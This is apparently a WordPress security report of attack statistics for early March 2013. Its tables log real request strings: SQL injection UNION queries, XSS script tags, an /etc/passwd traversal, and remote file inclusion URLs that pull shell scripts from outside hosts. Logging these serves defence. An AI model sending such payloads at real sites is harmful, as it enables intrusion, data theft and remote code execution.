Attack Trends March 1-15, 2013
Attack Type | Times Seen
Remote File Inclusion | 3867
SQLi | 1985
WordPress Username Deduction | 1119
Directory Traversal/Local File Inclusion | 711
XSS | 410
File Upload Attempt by Non-Admin Detected | 361
Possible XML-RPC Attacks | 356
WordPress Trackback | 156
Potential [PHP] code execution attacks | 28
PHP/CGI Source Code Disclosure/Coded Execution | 14
Attacking Countries | Times Seen
United States | 6737
Ukraine | 450
Russian Federation | 302
China | 281
Germany | 169
Canada | 164
Romania | 112
France | 109
Sweden | 108
Hong Kong | 77
Switzerland | 61
Netherlands | 58
Japan | 38
Poland | 35
United Kingdom | 34
Czech Republic | 29
Nigeria | 24
Israel | 23
Brazil | 22
Turkey | 21
Taiwan | 20
Europe | 19
Venezuela | 18
Norway | 18
Spain | 17
Korea, Republic of | 14
Italy | 14
Belarus | 11
Luxembourg | 8
Indonesia | 7
Mexico | 6
Australia | 5
Lithuania | 5
Thailand | 5
Kazakhstan | 5
Kenya | 4
Belgium | 4
Denmark | 4
Vietnam | 4
Chile | 3
United Arab Emirates | 3
Malaysia | 3
Madagascar | 3
Singapore | 2
South Africa | 2
Yemen | 2
Anonymous Proxy | 2
India | 2
Iran, Islamic Republic of | 2
Austria | 2
El Salvador | 2
Serbia | 1
Dominican Republic | 1
Lebanon | 1
Moldova, Republic of | 1
Colombia | 1
Estonia | 1
Jamaica | 1
Iraq | 1
Ghana | 1
Guatemala | 1
Attacked Plugins
/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php
/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2F551081_481072245272916_1741626627_n-300x200.jpg&w=600&h=300&zc=1&q=80
/wp-content/plugins/contact-form-7/images/id.flv???
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2Fradiopro.jpg&w=600&h=300&zc=1&q=80
/wp-content/plugins/jetpack/m
/wp-content/plugins/sniplets/view/sniplets/inset.php?text=
/wp-content/plugins/sniplets/view/admin/submenu.php?url=">
/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1'+UNION+ALL+SELECT+1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--
/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=Click me
/wp-content/plugins/sniplets/view/sniplets/warning.php?text=
/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1'+UNION+ALL+SELECT+CONCAT_WS(CHAR(59),version(),current_user(),database()),2--
/wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php?pst_title=1')+UNION+ALL+SELECT+CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- &page=100&rows=1
/wp-content/plugins/foxypress/foxypress-affiliate.php?aff_id="><script>alert(43875062308456)</script>
/wp-content/plugins/nextgen-gallery/xml/media-rss.php?mode=
/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(43875062308456)</script>
/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_id=">
/wp-content/plugins/couponer/print-coupon.php?ID=-1'+UNION+ALL+SELECT+1,version(),database(),current_user(),5,6,7,8,9,10--
/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd
/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1'+UNION+ALL+SELECT+CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4--
/wp-content/plugins/sniplets/view/admin/pager.php?page=">
/wp-content/plugins/oqey-gallery/getimages.php?gal_id=0'+UNION+ALL+SELECT+1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23
/wp-content/plugins/photoracer/changefrom.php?rid="><script>alert(43875062308456)</script>
/wp-content/plugins/photoracer/changeto.php?rid="><script>alert(43875062308456)</script>
Times Seen
167
8
5
4
3
3
3
3
3
2
2
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
Attacked Themes | Times Seen
/wp-content/themes/onepagewebsite/uploads/upload.php | 55
/wp-content/themes/deep-blue/images/upload/&fileext=php | 48
/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php | 10
/wp-content/themes/Avenue/cache/lobo.txt?? | 8
/wp-content/themes/folioway/timthumb.php?src=http%3A%2F%2Fpicasa.com.beerdunce.com%2Fbad.php | 7
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.bristel.co.uk%2Fsimple.php | 6
/wp-content/themes/Attack-Scanner-Theme/admin/upload-file.php | 4
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.xenophobiawatch.co.za%2Fsimple.php | 3
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fblogger.com.etres60.com.mx%2Fbad.php | 3
/wp-content/themes/blacklabel/framework/timthumb_old.php?src=http://picasa.com.sigem.ci/cok.php | 3
/wp-content/themes/cubed_v1.2/functions/timthumb.php?src=http%3A%2F%2Fflickr.com.howigotoutofdebt.com%2Fbad.php | 3
/wp-content/themes/clockstone/theme/functions/upload.php | 2
/wp-content/themes/folioway/core/thumb.php?src=http%3A%2F%2Fimg.youtube.com.marcomdistributie.ro%2Fbad.php | 2
/wp-content/themes/twentyeleven/wp-admin/'"--> | 1
/wp-content/themes/twentyeleven/wp-admin/?nsextt='"--> | 1
/wp-content/themes/folioway/core/thumb.php?src=http://wordpress.com.fb.bbdginc.com/jos.php | 1
/wp-content/themes/twentyeleven/wp-admin/?'"--></style></script><script>netsparker(0x000A59)</script> | 1
/wp-content/themes/twentyeleven/wp-admin/?hTTp://netsparker.com/n | 1
/wp-content/themes/twentyeleven/wp-admin/?http://www.netsparker.com? | 1
/wp-content/themes/wp-admin/?http://www.netsparker.com? | 1
/wp-content/themes/wp-admin/?nsextt='"--> | 1
/wp-content/themes/wp-admin/'"--> | 1
/wp-content/themes/twentyten/style.css | 1
/wp-content/themes/wp-admin/?'"--></style></script><script>netsparker(0x000A18)</script> | 1
/wp-content/themes/wp-admin/?hTTp://netsparker.com/n | 1
/wp-content/themes/koi/themify/img_x.php?src=http://picasa.com.kidsworldprintables.com/result/bat.php | 1
/wp-content/themes/themorningafter/timthumb.php?src=http%3A%2F%2Fwordpress.com.fb.bbdginc.com%2Fjack.php | 1
/wp-content/themes/?src=http%3A%2F%2Fwordpress.com.fb.bbdginc.com%2Fjos.php | 1
/wp-content/themes/'"--> | 1
/wp-content/themes/flashnews/timthumb.php?src=http%3A%2F%2Fflickr.com.coolrentals.ro/tim.php | 1
/wp-content/themes/twentyeleven/js/'"--> | 1
/wp-content/themes/twentyeleven/js/html5.js'"--> | 1
/wp-content/themes/twentyeleven/style.css'"--> | 1
/wp-content/themes/twentyeleven/'"--> | 1
/wp-content/themes/twentyeleven/colors/'"--> | 1
/wp-content/themes/twentyeleven/colors/dark.css'"--> | 1
Upload Directories Searched | Times Seen
/wp-content/uploads/2012/08/FB-RW-Cover2.jpg&w=960&h=300&zc=1 | 10
/wp-content/uploads/2010/08/rfihttp://sibkukla.ru/1/bb.jpg??? | 6
/wp-content/uploads/2010/08/rfihttp://www.comfaoriente.com//a/ipays.jpg? | 6
/wp-content/uploads/2010/08/dorks.txthttp://www.xfocus.net/tools/200608/r57.txt? | 5
/wp-content/uploads/2010/08/*.php?mosConfig_absolute_path=http://flickr.com.meuviciodesdeoinicio.com.br/bot.txt?? | 5
/wp-content/uploads/2012/08/FB-RW-Cover1.jpg&w=960&h=300&zc=1 | 4
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sibkukla.ru/1/bb.jpg??? | 4
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.comfaoriente.com//a/ipays.jpg? | 4
/wp-content/uploads/2012/08/Slide-KellyCattle.jpg&w=960&h=400&zc=1 | 4
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.travel-orzelbialy.zam.pl/galeria/include/copyright.txt?? | 4
/wp-content/uploads/2010/08/bbs_sun/skin/zero_vote/error.php?dir=http://flickr.com.annohelpt.nl/css.php?? | 3
/wp-content/uploads/2012/08/Slide-CattleMountain2.jpg&w=960&h=400&zc=1 | 3
/wp-content/uploads/2012/08/Slide-FeedingCalf.jpg&w=960&h=400&zc=1 | 2
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wushu.org.ge/e107_images/david.txt | 2
/wp-content/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt? | 2
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://picasa.com.radioalasnaciones.com/id.txt? | 2
/wp-content/uploads/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt? | 2
/wp-content/uploads/2012/08/Slide-RopingCalf1.jpg&w=960&h=400&zc=1 | 2
/wp-content/uploads/2010/rfihttp://www.comfaoriente.com//a/ipays.jpg? | 2
/wp-content/uploads/2010/08/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt? | 2
/wp-content/uploads/2010/rfihttp://sibkukla.ru/1/bb.jpg??? | 2
/wp-content/uploads/2010/08/index.php?go=http://www.travel-orzelbialy.zam.pl/galeria/include/copyright.txt?? | 2
/wp-content/uploads/2010/08/index.php?pag=http://www.khzshilat.ir/img/icons/bonze.jpg?? | 2
/wp-content/uploads/2010/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt? | 2
/wp-content/uploads/2010/08//components/com_smf/smf.php?mosConfig_absolute_path=http://heritagevirtualairline.net/bonze.jpg?? | 2
/wp-content/uploads/2010/08//main.php?page=http://www.travel-orzelbialy.zam.pl/galeria/include/pbot.txt?? | 2
/wp-content/uploads/2010/08//modules/vwar/admin/admin.php?vwar_root=http://www.sweet-affiliates.com/no-more-acne//config/bot.txt?? | 2
/wp-content/uploads/2012/08/Slide-Branding.jpg&w=960&h=400&zc=1 | 1
/wp-content/uploads/2010//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/byroe.jpg?? | 1
/wp-content/wp-admin/?http://www.netsparker.com? | 1
/wp-content/uploads/2010/08//accounts/inc/include.php?language=0&lang_settings[0][1]=http://blogger.com.ippi.cl/force2.php? | 1
/wp-content/uploads/2010/08//appserv/main.php?appserv_root=http://blogger.com.ippi.cl/force2.php? | 1
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://87.201.203.154/HTouch/kickstart/images/shawls/bonze.jpg?? | 1
/wp-content/uploads/2010/index.php?body=http://www.psychvisit.com/id1.txt? | 1
/wp-content/uploads/2010/08/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dubion.com/english/awmdata/menu/pop.jpg?? | 1
/wp-content/uploads/2010/08//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.picasa.com.sanalespri.com/b0t.php?? | 1
/wp-content/uploads/2012/'"--> | 1
/wp-content/uploads/2010/08//components/com_smf/smf.php?mosConfig_absolute_path=http://heritagevirtualairline.net/international.txt?? | 1
/wp-content/wp-admin/?hTTp://netsparker.com/n | 1
/wp-content/wp-admin/?'"--></style></script><script>netsparker(0x000A12)</script> | 1
/wp-content/uploads/'"--> | 1
/wp-content/wp-admin/'"--> | 1
/wp-content/wp-admin/?nsextt='"--> | 1
/wp-content/uploads/2012/10/'"--> | 1
/wp-content/uploads/2010//index.php?load=http://bmwtours.com/flight/include/id.txt???? | 1
/wp-content/uploads/2010//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/allnet.jpg?? | 1
/wp-content/uploads/2010//accounts/inc/include.php?language=0&lang_settings[0][1]=http://blogger.com.ippi.cl/force2.php? | 1
/wp-content/uploads/index.php?body=http://www.psychvisit.com/id1.txt? | 1
/wp-content/uploads/2012/11/'"--> | 1
/wp-content/uploads/2010/08//index.php?load=http://professionaldiving.ru/e107_files/public/avatars/data/pic82.jpg?? | 1
/wp-content/uploads/2010/08//main.php?page=http://www.wushu.org.ge/e107_images/david.txt | 1
/wp-content/uploads/2010/08//includes/orderSuccess.inc.php?glob=http://bmwtours.com/flight/include/id.txt???? | 1
/wp-content/uploads/2010/08/dorks.txt" h=http://troyanos.eshost.es/plugins/system/scan.txt? | 1
/wp-content/uploads/2010/08/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dubion.com/english/awmdata/menu/rock.jpg?? | 1
/wp-content/uploads/2010/08/agendax/addevent.inc.php?agendax_path=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? | 1
/wp-content/uploads/2010/08//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/byroe.jpg?? | 1
/wp-content/uploads/2010/08//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/allnet.jpg?? | 1
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://picasa.com.radioalasnaciones.com/load.txt??? | 1
/wp-content/uploads/2010/08//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dubion.com/english/awmdata/menu/mad01.jpg?? | 1
/wp-content/uploads/2010/08//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dubion.com/english/awmdata/menu/mad02.jpg?? | 1
/wp-content/uploads/2010/08/index.php?pag=http://www.khzshilat.ir/img/common/gov-trac.txt?? | 1
/wp-content/uploads/2010/08/index.php?go=http://www.wushu.org.ge/e107_images/david.txt | 1
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://apamagis.com.br/admconta/n.txt?? | 1
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? | 1
/wp-content/uploads/2010/08//header.php?abspath=http://picasa.com.blackwellbusiness.com//bot.txt?? | 1
/wp-content/uploads/2010/08//index.php?load=http://professionaldiving.ru/e107_files/public/avatars/data/foto81.jpg?? | 1
/wp-content/uploads/2010/08/dorks.txt=http://www.avidsen.com/2009/danger.txt?? | 1
/wp-content/uploads/2010/08/dorks.txt" h=http://www.alub.com.br/concursos/concursos/recursos/cmd.txt?&&r=s& | 1
/wp-content/uploads/2010/08//index.php?load=http://bmwtours.com/flight/include/id.txt???? | 1
/wp-content/uploads/2010/08/index.php?body=http://www.psychvisit.com/id1.txt? | 1
/wp-content/uploads/2010/08/impex/ImpExData.php?systempath=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? | 1